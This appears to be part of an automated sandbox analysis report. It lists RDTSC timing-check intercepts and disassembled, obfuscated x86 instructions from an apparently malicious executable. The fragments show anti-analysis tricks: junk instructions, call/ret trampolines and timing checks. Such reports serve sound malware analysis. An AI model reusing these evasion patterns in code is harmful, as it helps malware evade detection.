                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A1B second address: 538A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A1F second address: 538A25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B86C second address: 53B890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 and di, AE55h 0x0000000d push 00000000h 0x0000000f mov di, 7D11h 0x00000013 or edx, 57E028B2h 0x00000019 push EA82860Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 push edx 0x00000022 pop edx 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B890 second address: 53B949 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 157D7A75h 0x0000000f mov dword ptr [ebp+122D1A4Ah], eax 0x00000015 push 00000003h 0x00000017 je 00007F3F244F40DCh 0x0000001d mov ecx, dword ptr [ebp+122D2778h] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F3F244F40D8h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f and ecx, dword ptr [ebp+122D24A4h] 0x00000045 push 00000003h 0x00000047 mov dword ptr [ebp+122D1E93h], esi 0x0000004d push AEB7C77Ch 0x00000052 jmp 00007F3F244F40E2h 0x00000057 add dword ptr [esp], 11483884h 0x0000005e push 00000000h 0x00000060 push ebp 0x00000061 call 00007F3F244F40D8h 0x00000066 pop ebp 0x00000067 mov dword ptr [esp+04h], ebp 0x0000006b add dword ptr [esp+04h], 0000001Ch 0x00000073 inc ebp 0x00000074 push ebp 0x00000075 ret 0x00000076 pop ebp 0x00000077 ret 0x00000078 lea ebx, dword ptr [ebp+1244D751h] 0x0000007e jne 00007F3F244F40DAh 0x00000084 xchg eax, ebx 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F3F244F40E3h 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B98E second address: 53B9DE instructions: 0x00000000 rdtsc 0x00000002 je 00007F3F24EE26F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d ja 00007F3F24EE26F9h 0x00000013 mov di, si 0x00000016 mov dword ptr [ebp+122D1A3Dh], eax 0x0000001c push 00000000h 0x0000001e cld 0x0000001f mov dword ptr [ebp+122D2335h], edx 0x00000025 call 00007F3F24EE26F9h 0x0000002a jmp 00007F3F24EE26FCh 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F3F24EE2701h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B9DE second address: 53BA33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnc 00007F3F244F40D8h 0x00000014 pushad 0x00000015 jmp 00007F3F244F40E2h 0x0000001a jmp 00007F3F244F40DDh 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jnc 00007F3F244F40D6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BA33 second address: 53BA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BA38 second address: 53BA5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F3F244F40D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BA5C second address: 53BB01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2708h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F3F24EE2700h 0x0000000f push 00000003h 0x00000011 clc 0x00000012 push 00000000h 0x00000014 mov ecx, dword ptr [ebp+122D27E4h] 0x0000001a push 00000003h 0x0000001c jo 00007F3F24EE26F6h 0x00000022 push B83A8EC4h 0x00000027 push eax 0x00000028 jmp 00007F3F24EE2704h 0x0000002d pop eax 0x0000002e xor dword ptr [esp], 783A8EC4h 0x00000035 mov esi, dword ptr [ebp+122D29ACh] 0x0000003b lea ebx, dword ptr [ebp+1244D75Ah] 0x00000041 push esi 0x00000042 mov dh, 6Fh 0x00000044 pop edx 0x00000045 jmp 00007F3F24EE2708h 0x0000004a xchg eax, ebx 0x0000004b jmp 00007F3F24EE2705h 0x00000050 push eax 0x00000051 pushad 0x00000052 push esi 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BB7B second address: 53BC34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3F244F40E7h 0x0000000f nop 0x00000010 mov cx, 62AEh 0x00000014 push 00000000h 0x00000016 mov esi, 6400E677h 0x0000001b mov edx, edi 0x0000001d push 221B2ED3h 0x00000022 pushad 0x00000023 jnp 00007F3F244F40DCh 0x00000029 jc 00007F3F244F40D6h 0x0000002f jmp 00007F3F244F40E3h 0x00000034 popad 0x00000035 xor dword ptr [esp], 221B2E53h 0x0000003c call 00007F3F244F40E8h 0x00000041 mov esi, dword ptr [ebp+122D298Ch] 0x00000047 pop edi 0x00000048 push 00000003h 0x0000004a mov esi, 15CCECFCh 0x0000004f push 00000000h 0x00000051 jng 00007F3F244F40DCh 0x00000057 sub esi, 238242C3h 0x0000005d push 00000003h 0x0000005f push edx 0x00000060 mov dword ptr [ebp+122D1EEEh], eax 0x00000066 pop edx 0x00000067 call 00007F3F244F40D9h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f jnl 00007F3F244F40D6h 0x00000075 pushad 0x00000076 popad 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BC34 second address: 53BC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2705h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F3F24EE26FAh 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3F24EE2704h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BC72 second address: 53BC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BC78 second address: 53BCF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b jmp 00007F3F24EE2703h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F3F24EE2707h 0x0000001a pop eax 0x0000001b jmp 00007F3F24EE2707h 0x00000020 lea ebx, dword ptr [ebp+1244D765h] 0x00000026 jmp 00007F3F24EE26FCh 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F3F24EE26FEh 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCF1 second address: 53BCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E357 second address: 54E363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F3F24EE26F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559A9B second address: 559AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AA0 second address: 559AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AA5 second address: 559AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E0h 0x00000009 jno 00007F3F244F40D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AC4 second address: 559ACE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F24EE26F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DB5 second address: 559DD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DCh 0x00000007 jbe 00007F3F244F40D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 je 00007F3F244F40D6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DD8 second address: 559DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3F24EE2705h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DF7 second address: 559E0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3F244F40DCh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559E0B second address: 559E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559E13 second address: 559E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559FA8 second address: 559FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3F24EE26F6h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559FB3 second address: 559FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DBh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A3CD second address: 55A3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2700h 0x00000009 jo 00007F3F24EE26F6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F3F24EE26F6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A3F0 second address: 55A3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A9D2 second address: 55A9E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB3F second address: 55AB6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F3F244F40E3h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3F244F40E2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB6E second address: 55AB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE2705h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3DB second address: 55B3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3E1 second address: 55B3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3F24EE26F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B3EB second address: 55B3F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F244F40D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B56B second address: 55B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B56F second address: 55B573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B573 second address: 55B585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3F24EE26F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B585 second address: 55B5A0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3F244F40D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3F244F40DAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B7E5 second address: 55B7F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55B7F8 second address: 55B815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3F244F40E2h 0x0000000b pop edi 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BB60 second address: 55BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F3F24EE26FEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BB73 second address: 55BB79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BB79 second address: 55BB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561C99 second address: 561CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F3F244F40D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CA6 second address: 561CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2703h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CC7 second address: 561CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CCB second address: 561CDD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561CDD second address: 561CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560CD8 second address: 560CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560CDE second address: 560CF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F3F244F40D6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560CF3 second address: 560CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5682C4 second address: 5682DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E2h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5682DD second address: 5682E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5678C8 second address: 5678D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568140 second address: 568146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568146 second address: 568157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F3F244F40D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568157 second address: 568172 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3F24EE26F6h 0x00000008 jmp 00007F3F24EE26FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B916 second address: 56B946 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3F244F40D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F3F244F40E8h 0x00000012 jmp 00007F3F244F40E2h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B946 second address: 56B969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2707h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B969 second address: 56B96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B96D second address: 56B980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B980 second address: 56B9BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F3F244F40DBh 0x00000011 pop eax 0x00000012 call 00007F3F244F40E2h 0x00000017 add dword ptr [ebp+122D1E47h], esi 0x0000001d pop esi 0x0000001e call 00007F3F244F40D9h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B9BF second address: 56BA0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3F24EE26FAh 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 jns 00007F3F24EE26F8h 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F3F24EE2707h 0x00000023 mov eax, dword ptr [eax] 0x00000025 jc 00007F3F24EE2704h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BA0D second address: 56BA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BA11 second address: 56BA20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BB23 second address: 56BB37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F3F244F40D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BDA7 second address: 56BDAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C028 second address: 56C04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F3F244F40F4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F244F40E2h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C931 second address: 56C944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE26FFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C944 second address: 56C948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D8BF second address: 56D8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E27F second address: 56E289 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F244F40D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D8C5 second address: 56D8FB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F3F24EE26FDh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3F24EE2707h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56EAE6 second address: 56EB01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F5F7 second address: 56F5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570032 second address: 57003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57003C second address: 5700D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3F24EE26F8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub si, 4587h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F3F24EE26F8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or dword ptr [ebp+122D2456h], esi 0x00000050 push 00000000h 0x00000052 push 00000000h 0x00000054 push eax 0x00000055 call 00007F3F24EE26F8h 0x0000005a pop eax 0x0000005b mov dword ptr [esp+04h], eax 0x0000005f add dword ptr [esp+04h], 0000001Dh 0x00000067 inc eax 0x00000068 push eax 0x00000069 ret 0x0000006a pop eax 0x0000006b ret 0x0000006c mov edi, dword ptr [ebp+122D283Ch] 0x00000072 xchg eax, ebx 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F3F24EE26FDh 0x0000007a rdtsc
